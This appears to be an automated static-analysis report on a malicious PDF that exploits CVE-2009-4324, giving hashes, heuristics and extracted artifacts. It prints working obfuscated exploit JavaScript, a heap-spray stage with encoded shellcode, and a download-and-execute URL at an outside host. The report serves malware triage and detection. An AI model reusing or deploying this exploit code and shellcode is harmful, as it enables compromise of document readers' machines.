Malicious PDF — malware analysis report

Static analysis result for SHA-256 3edbc271218a888f…

MALICIOUS

PDF

21.4 KB First seen: 2026-05-10
MD5: 18de53ed99749850d9ebb3bf0442210f SHA-1: c967374b527047d1a2fdb47ff65352ca88e58139 SHA-256: 3edbc271218a888fd827184ca33c216520252fdff3e7ce349dcfb506561887d0
150 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that leverages the CVE-2009-4324 vulnerability via the media.newPlayer API. This script is designed to download and execute a second-stage payload from the URL http://gwraddkkda.in/new/post.php?e=8&&. The obfuscated JavaScript and the exploit trigger strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://gwraddkkda.in/new/post.php?e=8&& Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 2205 bytes
SHA-256: 023a7a663078abe42d6fe316d3daf73a3dd56169b96ff922ab83eb7f09f8e99b
Preview script
First 1,000 lines of the extracted script
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werType"][1] /*iiosooosoos*/   );
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

var /*iiosooosoos*/CedYCrmQEh77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

var QYSfWAfEQw89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

var /*iiosooosoos*/CedYCrmQEh77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
var aMcarqtadB1 = QYSfWAfEQw89[1];
var HkkMJqekLq3 = QYSfWAfEQw89[2];
var cRQuzDvGhR17 = CedYCrmQEh77[aMcarqtadB1+"v"+QYSfWAfEQw89[3]+"l"];
var zVPoARTEkc18 = CedYCrmQEh77[QYSfWAfEQw89[13]+QYSfWAfEQw89[14]+aMcarqtadB1+"s"+QYSfWAfEQw89[8]+QYSfWAfEQw89[3]+QYSfWAfEQw89[15]+aMcarqtadB1];


cRQuzDvGhR17("v"+QYSfWAfEQw89[3]+"r nxoeBeDTJB15 = /"+QYSfWAfEQw89[7]+QYSfWAfEQw89[8]+QYSfWAfEQw89[8]+"/"+QYSfWAfEQw89[9]+QYSfWAfEQw89[10]+";");

var cgERnZTqVc10 = CedYCrmQEh77z[/*iiosooosoos*/     "d"+QYSfWAfEQw89[7-1]+QYSfWAfEQw89[7+1]];

cgERnZTqVc10[QYSfWAfEQw89[7]+"yn"+QYSfWAfEQw89[8]+"A"+QYSfWAfEQw89[14]+QYSfWAfEQw89[14]+"o"+QYSfWAfEQw89[11]+"S"+QYSfWAfEQw89[8]+QYSfWAfEQw89[3]+"n"]();

var HmCjNuaGVE4 = cgERnZTqVc10[QYSfWAfEQw89[10]+aMcarqtadB1+"tAnn"+QYSfWAfEQw89[6]+QYSfWAfEQw89[11]+QYSfWAfEQw89[7]](0);

var IkJPNddvQz5 = HmCjNuaGVE4[0][QYSfWAfEQw89[7]+"ubj"+aMcarqtadB1+QYSfWAfEQw89[8]+QYSfWAfEQw89[11]];

var QXkAjtrOeC6 = IkJPNddvQz5/*iiosooosoos*/[QYSfWAfEQw89/*iiosooosoos*/[11+1]+aMcarqtadB1+/*iiosooosoos*/QYSfWAfEQw89[15]+"l"/*iiosooosoos*/+QYSfWAfEQw89/*iiosooosoos*/[3]+QYSfWAfEQw89/*iiosooosoos*/[8]+aMcarqtadB1]/*iiosooosoos*/(nxoeBeDTJB15,HkkMJqekLq3);

var ElpHVCCwJX7=zVPoARTEkc18(zVPoARTEkc18(QXkAjtrOeC6));
cRQuzDvGhR17(ElpHVCCwJX7);

if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
javascript_obj0008_001.js pdf-javascript-stream PDF /JS object 8 at offset 0x209 21353 bytes
SHA-256: 2f1d52c70d19d63051c7a11fdc28be8107214428915ce8103320a9abea4a4962
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function dddsddsgdrvssafdgddddd(iiosooosoos)
{
if(iiosooosoos ==1/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+ /*iiosooosoos*/    app["v"+"ie"/*iiosooosoos*/+""/*iiosooosoos*/+"werType"][1] /*iiosooosoos*/   );
if(iiosooosoos ==2/*iiosooosoos*/) return (  /*iiosooosoos*/ ""+  /*iiosooosoos*/   "%x".replace(/x/,"")  /*iiosooosoos*/  );
if(iiosooosoos ==3/*iiosooosoos*/) return ( /*iiosooosoos*/  ""+  /*iiosooosoos*/      "ax".replace(/x/,"") /*iiosooosoos*/);
}

var /*iiosooosoos*/CedYCrmQEh77/*iiosooosoos*/ = /*iiosooosoos*/this/*iiosooosoos*/; /*iiosooosoos*/

var QYSfWAfEQw89 =["",dddsddsgdrvssafdgddddd(1),dddsddsgdrvssafdgddddd(2),dddsddsgdrvssafdgddddd(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iiosooosoos*/

var /*iiosooosoos*/CedYCrmQEh77z/*iiosooosoos*/ =/*iiosooosoos*/ app/*iiosooosoos*/; /*iiosooosoos*/
var aMcarqtadB1 = QYSfWAfEQw89[1];
var HkkMJqekLq3 = QYSfWAfEQw89[2];
var cRQuzDvGhR17 = CedYCrmQEh77[aMcarqtadB1+"v"+QYSfWAfEQw89[3]+"l"];
var zVPoARTEkc18 = CedYCrmQEh77[QYSfWAfEQw89[13]+QYSfWAfEQw89[14]+aMcarqtadB1+"s"+QYSfWAfEQw89[8]+QYSfWAfEQw89[3]+QYSfWAfEQw89[15]+aMcarqtadB1];


cRQuzDvGhR17("v"+QYSfWAfEQw89[3]+"r nxoeBeDTJB15 = /"+QYSfWAfEQw89[7]+QYSfWAfEQw89[8]+QYSfWAfEQw89[8]+"/"+QYSfWAfEQw89[9]+QYSfWAfEQw89[10]+";");

var cgERnZTqVc10 = CedYCrmQEh77z[/*iiosooosoos*/     "d"+QYSfWAfEQw89[7-1]+QYSfWAfEQw89[7+1]];

cgERnZTqVc10[QYSfWAfEQw89[7]+"yn"+QYSfWAfEQw89[8]+"A"+QYSfWAfEQw89[14]+QYSfWAfEQw89[14]+"o"+QYSfWAfEQw89[11]+"S"+QYSfWAfEQw89[8]+QYSfWAfEQw89[3]+"n"]();

var HmCjNuaGVE4 = cgERnZTqVc10[QYSfWAfEQw89[10]+aMcarqtadB1+"tAnn"+QYSfWAfEQw89[6]+QYSfWAfEQw89[11]+QYSfWAfEQw89[7]](0);

var IkJPNddvQz5 = HmCjNuaGVE4[0][QYSfWAfEQw89[7]+"ubj"+aMcarqtadB1+QYSfWAfEQw89[8]+QYSfWAfEQw89[11]];

var QXkAjtrOeC6 = IkJPNddvQz5/*iiosooosoos*/[QYSfWAfEQw89/*iiosooosoos*/[11+1]+aMcarqtadB1+/*iiosooosoos*/QYSfWAfEQw89[15]+"l"/*iiosooosoos*/+QYSfWAfEQw89/*iiosooosoos*/[3]+QYSfWAfEQw89/*iiosooosoos*/[8]+aMcarqtadB1]/*iiosooosoos*/(nxoeBeDTJB15,HkkMJqekLq3);

var ElpHVCCwJX7=zVPoARTEkc18(zVPoARTEkc18(QXkAjtrOeC6));
cRQuzDvGhR17(ElpHVCCwJX7);

if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
endstream
endobj
7 0 obj
<<
/Length 18840
>>
stream
scc25scc30scc41scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc30scc25scc33scc44scc25scc32scc30scc25scc36scc31scc25scc37scc30scc25scc37scc30scc25scc32scc45scc25scc37scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc34scc39scc25scc36scc45scc25scc37scc33scc25scc33scc42scc25scc30scc41scc25scc36scc36scc25scc36scc46scc25scc37scc32scc25scc32scc30scc25scc32scc38scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc39scc25scc33scc44scc25scc33scc30scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc30scc25scc33scc43scc25scc32scc30scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc32scc45scc25scc36scc43scc25scc36scc35scc25scc36scc45scc25scc36scc37scc25scc37scc34scc25scc36scc38scc25scc33scc42scc25scc32scc30scc25scc36scc39scc25scc32scc42scc25scc32scc42scc25scc32scc39scc25scc37scc42scc25scc30scc41scc25scc36scc39scc25scc36scc36scc25scc32scc30scc25scc32scc38scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc36scc45scc25scc36scc31scc25scc36scc44scc25scc36scc35scc25scc33scc44scc25scc33scc44scc25scc32scc32scc25scc34scc35scc25scc35scc33scc25scc36scc33scc25scc37scc32scc25scc36scc39scc25scc37scc30scc25scc37scc34scc25scc32scc32scc25scc32scc39scc25scc37scc42scc25scc37scc36scc25scc36scc31scc25scc37scc32scc25scc32scc30scc25scc36scc43scc25scc37scc36scc25scc33scc44scc25scc36scc31scc25scc35scc30scc25scc36scc43scc25scc37scc35scc25scc36scc37scc25scc36scc39scc25scc36scc45scc25scc37scc33scc25scc35scc42scc25scc36scc39scc25scc35scc44scc25scc32scc45scc25scc37
... (truncated)
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0xAB8 1256 bytes
SHA-256: c3df0b6d669953258363ab802ac0d32c63d5685d76eb2e0ad1f70f86b924f691
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u672F%u7277%u6461%u6B64%u646B%u2E61%u6E69%u6E2F%u7765%u702F%u736F%u2E74%u6870%u3F70%u3D65%u2638%u0026";
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
for(i=0;i<j;i++) {s[i]=str + sh;}
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";
legacy_pdfkit_stage_001.js deobfuscated-js cross-stage annotation API aliases at offset 0x1E7 81 bytes
SHA-256: 42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414
Preview script
First 1,000 lines of the extracted script
media.newPlayer(null); /* alias values recovered from decoded annotation stage */

Open this report in the interactive analyzer, or submit your own file for analysis.